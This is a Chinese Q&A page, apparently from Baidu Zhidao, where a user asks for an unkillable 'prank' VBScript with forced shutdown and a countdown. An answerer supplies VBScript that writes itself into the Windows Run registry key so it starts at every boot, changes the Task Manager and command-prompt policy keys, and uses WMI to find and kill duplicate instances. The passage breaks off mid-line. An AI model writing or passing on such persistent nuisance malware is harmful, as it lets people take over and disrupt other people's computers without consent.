整人的vbe小软件 要厉害的 高手进 高分

来源:百度知道 编辑:UC知道 时间:2024/05/26 20:47:41
最好有个自动关机 倒计时 还有关不掉的东西 越多越好 100分 还有教我破解 515493749@qq.com
2L的 你的很好 能补充成如果关不掉就开机启动吗 如果可以 两百分你拿走

可以啊 修改如下:

set s=createobject("wscript.shell")
set bag=getobject("winmgmts:\\.\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='wscript.exe'")
For Each id in pipe
if instr(1,id.CommandLine,wscript.scriptfullname)<>0 and pipe.count>=2 then
s.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\","","REG_SZ"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
id.terminate()
else
s.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\",wscript.scriptfullname,"REG_SZ"
s.regwrite"HKCU